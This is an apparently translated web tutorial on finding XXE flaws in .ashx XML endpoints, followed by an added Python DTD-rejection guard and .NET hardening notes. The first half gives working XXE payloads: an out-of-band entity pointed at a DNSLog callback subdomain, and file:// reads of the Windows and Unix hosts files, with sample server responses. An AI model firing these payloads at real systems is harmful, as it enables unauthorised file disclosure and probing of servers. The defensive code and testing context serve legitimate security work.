Characteristics
-
Characteristic 1: .ashx
The URL ends with the .ashx suffix.

-
Characteristic 2: the response body is XML

Any endpoint that shows these characteristics can be tested with the procedure below.
Testing
Online tools:
http://ceye.io/
http://www.dnslog.cn/
https://dnslog.io/
http://admin.dnslog.link/ account: test, password: 123456
I will use www.dnslog.cn as the example here.
Note
The request must be sent with the content type changed to:
Content-Type: application/xml
Payload
Replace http://127.0.0.1:80 with the subdomain you obtained from "Get SubDomain".
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:80" > %xxe; ]>
# or
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://127.0.0.1:80">
]>
<r>&sp;</r>
Then click "Refresh Record". If an access record appears, the parser resolved the external entity and the endpoint is vulnerable to (at least out-of-band) XXE.

Arbitrary file read test
The idea is to build a payload that references a file every system has (hosts), then read the response and supply whatever the server complains is missing. If the XXE is the echoing (in-band) kind, the contents of the referenced file will be printed back in the response.
file:///c:/windows/system32/drivers/etc/hosts
file:///etc/hosts
# payload
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///c:/windows/system32/drivers/etc/hosts">
]>
<r>&sp;</r>
# response
<?xml version="1.0" encoding="utf-8"?><response><header><actionCode>1</actionCode><rspType>7</rspType><rspCode>9011</rspCode><rspDesc><![CDATA[請求報文頭部不能為空]]></rspDesc><digitalSign /><rspTime>2020-04-09 16:58:34.877</rspTime></header><body></body></response>
# payload
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///c:/windows/system32/drivers/etc/hosts1">
]>
<r>&sp;</r>
# response
<?xml version="1.0" encoding="utf-8"?><response><header><actionCode>1</actionCode><rspType>7</rspType><rspCode>7000</rspCode><rspDesc><![CDATA[介面程式執行錯誤]]></rspDesc><digitalSign /><rspTime>2020-04-09 17:01:08.121</rspTime></header><body></body></response>
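The two tests above (the DNSLog callback and the hosts-file read) both depend on the server-side parser accepting a DOCTYPE and resolving the entity it declares, which is also why the responses for an existing file (9011) and a non-existent one (7000) differ. The defence is to reject any document that carries a DTD before a single entity is resolved. The Python below is an added example, not code from the original post; it uses only the standard library's expat bindings, reuses the two payloads quoted above as test input, and accepts a constructed benign request whose element names (`request`, `header`, `actionCode`) are made up for the example.

```python
"""Reject XML that declares a DTD before it reaches the real parser.

Added example (not from the original post): gates an untrusted XML body so
that neither the out-of-band callback payload nor the file:// read payload
can ever have its external entity resolved. Standard library only.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DtdForbidden(ValueError):
    """Raised when an inbound document carries a DOCTYPE or an entity declaration."""


def scan_for_dtd(xml_bytes: bytes) -> None:
    """Run a throw-away expat pass whose only job is to abort on DTD constructs.

    expat fires StartDoctypeDeclHandler as soon as it sees '<!DOCTYPE', before
    any entity in the internal subset is declared, let alone resolved. The
    EntityDeclHandler is a second line of defence for the same thing.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdForbidden(f"DOCTYPE '{name}' is not allowed in this request")

    def on_entity(entity_name, is_param, value, base, system_id, public_id, notation):
        raise DtdForbidden(f"entity declaration '{entity_name}' is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(xml_bytes, True)  # raises DtdForbidden or ExpatError


def parse_untrusted(xml_bytes: bytes) -> ET.Element:
    """Parse untrusted XML, refusing any document that declares a DTD."""
    scan_for_dtd(xml_bytes)
    # ElementTree's expat-based parser never fetches external entities itself,
    # so once the DTD gate has passed, parsing the body is safe.
    return ET.fromstring(xml_bytes)


def classify(xml_bytes: bytes) -> str:
    """Return 'rejected-dtd', 'malformed' or 'ok': the value a request-log hook would record."""
    try:
        parse_untrusted(xml_bytes)
    except DtdForbidden:
        return "rejected-dtd"
    except (xml.parsers.expat.ExpatError, ET.ParseError):
        return "malformed"
    return "ok"


# The two payloads quoted in the post: the OOB callback and the hosts-file read.
PAYLOAD_OOB = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:80" > %xxe; ]>"""

PAYLOAD_FILE = b"""<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///c:/windows/system32/drivers/etc/hosts">
]>
<r>&sp;</r>"""

# Constructed benign request body; the element names are made up for this example.
BENIGN = b"""<?xml version="1.0" encoding="utf-8"?>
<request><header><actionCode>1</actionCode></header><body/></request>"""


if __name__ == "__main__":
    for label, doc in (("oob", PAYLOAD_OOB), ("file", PAYLOAD_FILE), ("benign", BENIGN)):
        print(f"{label}: {classify(doc)}")
```

Note that the OOB payload has no root element at all, so a well-formedness check alone would only report "no element found" after the DOCTYPE had already been processed; the gate rejects it on the DOCTYPE first. For the .ashx handlers the post targets, the equivalent on the .NET side is to leave XmlReaderSettings.DtdProcessing at Prohibit and set XmlDocument.XmlResolver to null, so that SYSTEM identifiers are never dereferenced.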
Please credit the source when reposting. Link to this article: https://www.uj5u.com/qita/30931.html